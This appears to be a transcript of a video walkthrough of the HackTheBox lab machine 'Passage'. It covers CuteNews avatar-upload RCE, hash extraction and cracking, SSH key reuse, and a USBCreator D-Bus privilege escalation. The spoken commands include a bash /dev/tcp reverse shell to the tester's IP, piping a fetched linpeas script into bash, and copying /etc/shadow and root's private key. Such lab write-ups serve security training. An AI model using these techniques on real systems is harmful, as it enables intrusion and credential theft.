What's going on YouTube? This is Ipsec. I'm doing Passage from HackTheBox, which was a super fun box that had a lot of small steps, but as long as your recon game was on point, each step shouldn't have taken too long. It starts off with finding a website and identifying it runs a software called CuteNews. Looking at the exploits, you can see that it's vulnerable to a image upload vulnerability through the avatar, but you can just use SearchSploit, download the exploit, run it, and get a shell without even knowing what you're doing. Looking at the CuteNews, you enumerate it to pull the hashes of the users of the website and realize one of those users also has a shell account and the password is the same. So you use SU to switch over to him, and he shares SSH keys with another user on the box. So you grab the SSH key and SSH into the box. And as that user, you can dig around and you notice the Vim history file, and the Vim history is editing the USBCreator software to be able to be ran from the sudo users instead of root, which lets you read and write files as root. So you can just grab root's SSH key using USBCreator, copy it to whatever directory you want, and log into the box. So with all that being said, let's jump in. As always, we're going to start with the nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory, but first, we have to create that directory, call it passage, and then the IP address of 10.10.10.206. And since I haven't ran this already, I'm going to add the -v flag. I have done this machine once before, like earlier in the day, but I didn't really prepare to do this video because it is 1 o'clock on a Friday, and I post these videos at 10 o'clock on Saturday. So I have less than 24 hours to get this done. And when you consider the image thumbnail, some encoding the video and uploading to YouTube generally takes about 4 hours, I have very little time to get this done. So hopefully the video doesn't suffer. Looking at the results of the nmap, we do have 2 ports open. SSH on port 22, its banner tells us it's a Ubuntu server. We also have HTTP on port 80. Its banner tells us it's Apache HTTPD 2418. And I believe just from this information, we can tell this is, I think, Xenial. Let's just Google Launchpad Apache 2418. Go to this package. And this build is Xenial. So most likely, we're running Xenial. Let's look at the actual page. So if we go to 10.10.10.208, wait, is it 208 or 206? It's 206. I don't know why I said 208 there, but I got it right in my nmap scan since ports came back. Awesome. We do have this page that says Passage News, and a lot of lorem ipsum stuff, which is just generic text that means nothing. But there is one thing, implemented failed to ban. So looking at this, it's just saying failed to ban exists on the server. And generally when this happens, I won't bother with go busting it because I don't want to get banned. Because if I get banned, I'll be sad for a few days or a few minutes, I guess. At the very bottom, we do see it is powered by CuteNews. And there is a copyright of 2020 and it is 2021. So copyright is old. That being said, this box did come out in 2020, so maybe the copyright isn't old for when the box came out. The very first thing I always test when I see this ID parameter is I put a single quote and see what happens. We get article can't be found, so I'm going to do a single quote and then a comment in SQL, and we still can't get the article. I'm going to change that single quote to be a double quote, and then I'm going to get rid of quotes altogether. And it's always cannot find article with ID 11. So I'm going to go to article 10. Article 9, is that still failed? Wait, what? Okay. That is weird. Every article I do, oh wait, 8 did not. 9, 10, and 11 all went to this failed to ban page. Okay, I don't understand what is going on there. But if we go to 8, I'm going to try 8 plus 1, and it can't find article with ID 8. So I was just testing if math worked, because if it went to article 9, we know we have some type of eval or something happening. If we force the application to do math, maybe we can force it to do something else. So I'm at a dead end there. If we go to this RSS feed, it's the same exact thing. But I'm going to take a look at CuteNews. So I'm going to Google CuteNews GitHub. And the very first thing I generally do is I look at ways I could potentially identify the version. So we have this readme.md and license.txt. So I'm going to try readme.md and license.txt. So nothing there. If we wanted to spend a lot of time enumerating the version, we could potentially go in here and find something that changes periodically. Maybe they change like the jQuery version, something with JavaScript, and then just find all the versions of CuteNews that JavaScript changed, MD5 some the JavaScript, and then MD5 the JavaScript on Passage News and compare. But we've done that before. I forget what video. It's one of my super old videos. Let's see, ipsec.rocks. I'm going to search like version Java. Okay, no. I don't have it indexed. Maybe by the time this video is uploaded, I'll find it and fix the index so you can see it. But until then, yeah, hopefully my description made sense. So since we can't really find the version, what we're going to do is just blindly throw exploits. So let's do SearchSploit CuteNews and see what we have. There is a RCE on CuteNews 212. So let's do a SearchSploit-X to look at this exploit. And also it looks like 212 is like the latest version ExploitDB has, which is good for us. Let's fix up our typo. And we can see this is a 2019 CVE, 2020 date posted. So this does have some promise. If we look through the source, let's open this up, let's mirror it, and then open up in Vim so we have some syntax highlighting, because that's always good. We can get a brief idea of what the script does by quickly going over it. So we are setting up a Python request session here, and then the payload is going to be an image. So GIF8, these are the magic bytes for a GIF, and then it just stands up a simple PHP reverse shell. So we have this function, extract credentials, and then there's a function called register, and then send payload. So I'm going to go to the end of the script to see exactly what this does. First, it's going to attempt to run this extract credentials, then it's going to run register, and then payload. Awesome. So weirdly enough, it looks like you can extract the credentials before logging in by that logic. That is odd. So it's just going to IP, CuteNews, CData, users, lines. 10.10.10.206, CuteNews, users, CData, lines. CuteNews, CData, users, lines. CuteNews, CData, then users, lines. And we get a bunch of hashes. I don't know why that failed, but we got something. If we see, I did not know this before. This could be even quick. So we got base64 there. We got invalid input because there is a space. So let's grab this one. Echo-n, paste this, base64-d, a different user. This, maybe there's just no passwords in this. Let's grab this. It's probably a better way to do this. I wonder if oh, there we go. We got a hash right there. That's Nadav's hash. Let's see. Why is it hitting base64 invalid thing? But you could go through this and decode all the base64. And I wonder if we could just go to CyberChef if this makes it easier. Because we can probably find where the bad characters are and then just put line breaks to easily do it. So from base64, send it here. Oh, it's just magical. It says, okay, well, it errored. We're going to try to start this base64 thing over again and give you everything. So we're going to do this real quick, and then we're actually going to step through the exploit. I didn't realize it was that easy if you just go to that file. If we go back to CuteNews, let's see. I think it said like 2.0 is like secure. Maybe not. Starting with 2.0, we've improved capacity, speed, and security of the CMS. That's kind of funny that you can just go to a file. Okay, so what I want to do was do output.text, and we have all this. If we look at output, it's PHP objects, so we could probably find a way to import this in PHP, but I see pass and then 64, it's a string. So if you go to my like PHP deserialization, you'll know password string 64 characters. So this is probably 64 character hash. We can verify that with echo-n and then wc-c, 64. And hashes are always going to be, what is it? A through F, I think, and then 0 through 7. I was doing them in my head, like A, B, C, D, E, F. But yeah, so F is the last one. What we can do is cat this output, and then grep-op, because this is going to be overpowered. And then A through Z, I think it's just A, I think it's A-C, 0 through 9. And then output.text, and we specify 64 characters like that. And then it's going to grep, and like I said, overpowered, only show us the matches. So we have a few hashes right here. So with just grabbing that file, we were able to get password hashes. The hashes.text. So what we're going to do is do it, I guess, the intended way and step through the exploit and use this exploit. So that was a fun little side rant. I shouldn't go on those when I'm so little on time, but oh well, can't help it. So we're registering our user here, and it doesn't look like anything is too interesting. Remember, all the way at the top, there is this payload equals and the image. So we're looking for payload. We could do a search for payload, but I like stepping through the code. It's doing a token, so it looks like some type of cross-site request forgery check here. And then scrolling down, we have this avatar file, and it's putting our username or something here, logged user, and then payload. So this is just a simple image upload where we're replacing our avatar or a logo for a user with a exploit. So we kind of have an idea how that works. So let's go back all the way to the top. It's using Python sessions. So we can actually do ses.proxies update, I think. HTTP 127.0.0.1.80.80. And this needs to be a dictionary, because you could specify, like, if you want an HTTPS afterwards and specify where that proxy is. So that's a dictionary value. Put that in. And I think this will now go to my burpsuite. So Python 3 4880. We have to update or open burpsuite. Let's come on, open. It always takes so long to open when you're waiting on it. As with all applications. Yeah, my license is going to expire soon. Starting the project. Proxy. Yeah, we want to intercept. Okay. So let's run this and see if I updated the code correctly. So HTTP 10.10.10.206. And we see a little red dot at the bottom of my screen, so we are intercepting. I'm going to, what is it? Change request, do intercept response to this request. Because it's saying it didn't extract hashes from this when we did. So we can see there are definitely lots of hashes. I guess if we actually download the source, we would have seen these calls that separates the base 64. So it would have been even easier if on this page, I did like Control U to view source and saw that. And then I could just grep these out and do like 4 line in and get a better base 64 decrypt. But oh well. So we see this. For some reason it can't. Here it is registering. Random string for the user and password and email. then it's going to get this. I'm guessing it's trying to get the session token or the cross-site request forgery token. And here we're doing a post to the index to update our avatar. And for the avatar file, this is the logged user, we have our exploit. So we forward this, we go back here, and we have a shell. So if we just do ls, it's going to send it to our PHP shell, or like whatever we dropped, that one file that has the execute command, and runs it. So we can do this. The downside to this is it's not interactive. Every time we run something, it's going to restart a bash, and I really do not like that. So we're going to get a reverse shell. So nc lvnp 9001, and out of good habit, let's run script. Let's see, webshell.log, and now we can do nc lvnp 9001, and I just did that. So every command I'm going to type down here is going to be logged to a file. It's just good habit to do that. So bash-c bash-i dev tcp 10.10.14 IAM4 port 9001 0 and 1 is our reverse shell that we like using, and we now have a shell. So I'm going to do python 3-c import pty.spawn bin bash, and then we can do control-z stty raw minus echo, hit fg enter twice, so fg enter enter, and now we have a shell that we have like tab autocomplete and things. I'm also going to export term to xterm, so now I can clear the screen, and then we will notice like my terminal is kind of screwed up if like I'm going to the end of the line and it keeps going back and like this, not going to the next line. So let's fix that real quick. I'm going to go to a blank pane. I'm going to do stty-a, and we want 34 and 136. That's rows and columns. So stty rows 34, cols 136. And now when I do this, it's fixed, and we'll go down to the next line. So definitely does help to clear up your reverse shell. Let's see. The very first thing I want to do is, let's see if we go to home. Awesome. I'm going to cat etsy passwd, see what www data is, grep www, no login. So I was thinking if I was here and I make dir SSH, if I had the permission to do that and I had a shell, I could just SSH into this box and clear up and get a better shell that way. Because even though this is like netcat session is pretty good, SSH would always be better. So the very first thing I generally do whenever I get on is see if there's something I could have done on recon. So I'm going to grep 212-r period, pipe that over to less. I just want to see files that contain 212, which is what I assume is the version. I'm correct by the version. Security.php and init.php. These are like images. So it doesn't look like there's any way I could have identified it was vulnerable. So the next thing I want to do is probably grab any password I can out of the database. We know there's a bunch of hashes that we already got through that CData users lines earlier, but I want to see if there's like a database. So I'm going to do find .grep conf, and I'm looking for config, and we got 2. So we got the CData conf.php. If we cat it, base 64. That looks bad, like such a weird way for this application to work. So it's got this one line PHP die. So the second line we want, we can just do tail-1 conf.php base 64-d. And we can see the contents of this file. I don't know why CuteNews decides to base 64 encode everything, but it does. Doesn't look like anything interesting. If we go to config.php, I wonder if we're going to have to do that same exact thing. Config.php, we don't. I'm going to grep -i for pass to see if it has password. It doesn't. We can do find.grep database. And at this point, I'm like, there's no database, SSLNPT, and I don't see port 3306 or any type of database running. We could also look at like grep SQL and see if there's like an SQLite file. There isn't. So everything appears to be a flat file. So maybe that's the benefit of CuteNews. It's a CMS that doesn't require a database. It's just file-based. There's this usersdb.php that looks interesting. If we look at it, you don't have access to open this file. What? Okay. Let's go to users. And this is where that lines file is. And we can look at like 09.php, cat09.php. It's got that weird PHP die thing. So we can just tail-1 base64-d. And we get this. So we want to probably go through all these PHP files. If we did find dot dash dash name star.php, and I think this has to be like that, dash dash name equals. I'm horrible with find for some reason. There we go. It's not dash dash, it's just dash name. I always screw up find's syntax. So I'm going to pipe this over. Actually, let's do for I in find do tail-1i. So now it's going to tail every file, pipe it over to base64-d, and then we can say echo and done. So now we have all the base64 catted. We know this is going to be, well, that's more. That's not a hash. Where's 64? 64, pass. There we go. So we know it's a 64 like hex thing. So again, we can just pipe grep-op A to Z 0 to 9 64 and get the hashes. So it looks like we have more hashes than we did before. vhashes.text. Oh, maybe we don't. Let's see, that's 5, 7 to 13. Yeah, we have one more hash. S66, 4BD. This D2 hash is new. 71, E2. Oh, we have one more hash because our exploit created a user. That's fine. Let's just sort-u hashes.text. And let's try cracking these. Or we can identify it. 64 characters hexadecimal most likely is going to be SHA-256. But if you don't know, you can just run hash identifier, give it, and it will say what it is. Probably SHA-256. We can go over to Hashcat if we wanted to, but there's enough videos of that. The very first step generally for like cracking hashes that you don't think are going to be too important is just sending it over to a cloud service. So let's go and search for hashes.org. Is this site still down? Maybe we'll have to go to Hashcat. Online hash crack. CrackStation. Let's see if it's in CrackStation. We can paste it. Palm trees. At this point, Hashcat may have been faster. I hate CAPTCHAs. So we have egress, which I guess is one of the testers of this machine, Atlanta1, and hacker. If we go back in our burpsuite and look at our history for register, we can see, is there a password here? Oh, no. So I don't know what password hacker is. So hacker and Atlanta, I don't know. So we want to look at E7D3. So let's see. We just go back to a browser on this line. It's base64. CyberChef E73D. E7D3. Okay, maybe that's the new hash. CrackStation. Let's do E26. E26. So this user is going to be Paul. I don't know what that hacker user is. Maybe that is one we create, and I just misread the source. Let's find it. So what we're going to do is go back to our find command, and we can do tail-1 base64-d echo done grep this line. So here's the hash. Let's see. Oh, egress. So I wonder if egress has two accounts. Egress at test.com, and let's look at 4bd1. And it wouldn't be out of the ordinary for him to have two accounts because he was probably testing if this box can be solved multiple times. So yeah, there is two passwords for him. Okay, well, at least we solved that. Paul's password is Atlanta1. So what we can do is try SSHing. SSH Paul at 10.10.10.206. And we have permission denied public key. We can try su-paul and log in, and we do get in. So we can't SSH because we don't have a public key. As I said, we always want to upgrade to an SSH session. So we go in.ssh and see there's already an IDRSA and IDRSA.pub. If we look at IDRSA.pub, the weird thing is it's owned by someone else, Nadav, who is another user on this box. If we cat etc past wd, and we can grep for every line that ends in sh, because we want to know shells, like the other shell would be sh instead of bin bash would be bin sh. So that's why I just look at sh. But we have root, Nadav, and Paul. So if we go back to this IDRSA.pub, it's weird that Nadav has a key here. If we look at authorized keys, Nadav can SSH in, and there is an IDRSA, which is the private key. What I want to do is take this private key and see if it matches this public key. So SSH keygen -y IDRSA. We need -f for file. And that's going to generate the public key for that private key. If we now cat IDRSA.pub, we can see this, and eyeballing it, it looks like the same. Like it ends in 49D and begins with a bunch of A's, so it looks fine. But what I'm going to do is a printf command, because printf will let me like put a line break in easily. So I'm going to do printf, and we're going to say the command SSH keygen IDRSA, and then we're going to say the command \n to do a line break, and then the command awk print 1 space 2, because we want to grab this, and then remove this on IDRSA. Yeah, I think it's here, RSA.pub, like that, and then end the printf. So now it just prints two things. So what we can do, unique -c to count, and we see 2. So they are identical. You could also do sort -u, and since it only spits out 1, it removed the unique. But if you compare it against a lot of public keys, the unique -c would help. You'd probably want to do sort then unique -c, because unique's only going to compare each line to what's directly above and below it. So if you do a sort first, then all the uniques will be directly above and below. But yep, we have this, which is the same. So this SSH key probably goes to 2 different users. So let's cat it out, and we could just SSH-I IDRSA Nadav at 127.0.0.1, accept the key and get in that way. But as I said, I always like just SSHing for my bot, so we could do IDRSA and then chmod plus 600 IDRSA SSH. Actually, let's move IDRSA to Nadav, just to say organized. Nadav at 10.10.10.206. Specify the file. There we go. Invalid format, but it lets us in. That invalid format is probably because it ends in a line break. I don't know exactly what the invalid format is. It's invalid, but it reads the key anyways and lets us in, so oh well, won't hurt too much on it. And we can get into Nadav's profile. So what we can do is lsla and look at the history, and which is 0. So bash history is removed from this box. But there are other good files. What is DMRC? I don't even know what this one is. Probably desktop manager, RC probably gets executed when it starts. Examples desktop, ICE authority, gconf. So this does have GNOME installed. It is a desktop. There is a .nano directory, so let's go in here, look at it. Nothing there. Pictures, profile, SSH. We can look at .ssh and see if there's anything interesting in authorized keys. Just Nadav's key. Let's see, we stopped at SSH. Sudo as admin successful. We can do sudo-l. We need his password, which we don't know because we just SSH'd. There is this VIMINFO. We can also do groups to see what group we are in. We're in the sudo group. So if we knew Nadav's password, we could probably sudo, but we don't yet. There is a VIMINFO. So if we look at VIMINFO, this does give some history of what this user was doing in Vim. So we can see like command line history. He ran a search and replace and changed admin identity's root to admin identity's sudo. So he gave himself access to something. I'm guessing this is the root group, and he changed to sudo, which he is a member of, and wq saved and quit. I don't know what file that is. If I had to guess, it's going to be one of these. If you've noticed, Vim always starts off where you left off. This is why. It's the file marks. So we can kind of see his Vim history of files he edited. So I'm going to look at admin identities and those file marks. So let's see. If I just grep for this, like maybe I have to escape that VIMINFO. Sweet. I was looking for starts the line with a single quote. So we can grep admin ident on this file to see if it exists. It does not. And we can grep admin ident on the next file. And it does exist here. So this is the file he changed. This USBCreator is odd. So I'm going to do two things. I'm going to run linps and then look at what USBCreator is. If we do psef grep-i USB, doesn't show up, but yeah, let's do that. Let's run linps so we have something running in the background while we do some research. So make dir www cd www cp opt privileged escalation script suite linps linps.sh, copy it here, and we want to start a web service, so python 3-m http server, and we can curl 10.10.14.4 linps.sh, pipe it over to bash, specify port 8000. Okay, that's running. So now we can say USBCreator. I'm going to say Privesc. We have a few things. ExploitDB has something. This blogspot has something in 2015. 2019 has something. And Hacktricks has something. Hacktricks is probably going to be my go-to. So let's see. Ubuntu Desktop utilizes dbus as its IPC mediator. So it's kind of just a way for processes to talk to each other. And let's see. He's talking about how he used dbus to look at it. Let's see, is there busctl, list interface, vulnerable scenario. Oh, yeah, if you want to go to another one, the video ouch is where we talk about dbus a lot. There's so many things that happen in HackTheBox. So this was, HackTheBox was exploiting a custom dbus thing. Let's see, this was the old one. USBCreator. So this is sending, let's see, this was 2015 of it sending it a library to load, or we're overwriting LD preload with this. So since we overwrite LD preload, it will run the next time like an ASLR binaries, or not ASLR, dynamically linked binaries ran, and then execute. But it says it is patched. There was another one, this Palo Alto one. So if you read this whole article, it does give you kind of a POC at the end. And essentially what this is allowing us to do is interact with USBCreator and have it call a command. And the purpose of USBCreator is to like convert an ISO to a USB drive so you can boot. At least that's what I've used it for. And it's kind of a weird Privesc. This is one of those that's going to be like maybe a version of UAC, because if we had the password to this user, we could just sudo -l and probably bin bash, but we don't know the password. However, this application is letting us bypass that. It's giving us root-like privilege without the password. So we're going to do GDBus call --system destination com Ubuntu USBCreator to send it to that daemon object path com Ubuntu USBCreator USBCreator, I think it was method, and here's the method we're calling out of that. We're calling USBCreator image, and then it's essentially taking a file and copying a file. So com Ubuntu USBCreator.image, and we have to take a file and we want to copy it somewhere. We can try etc shadow to dev shm shadow true. If we cat dev shm shadow, we could now potentially crack the passwords. But these are SHA-512 crypt, which it'll take us a while to crack them. I was hesitant to do hashcat before because I was just lazy, not because it would take a long time. But this time it will actually take a long time. We can try like root SSH ID RSA dev shm root key to see if root has a private key in its directory. Cat this, and we do. So we have this ID RSA key. We can grab it, and let's see if we can SSH with it. So go up, v root, paste the key, chmod 600 root, ssh-i, root, and root at 10.10.10.206. And we have rooted the box. So now we are root on this. So hope you guys enjoyed the video. Take care, and I will see you all next week.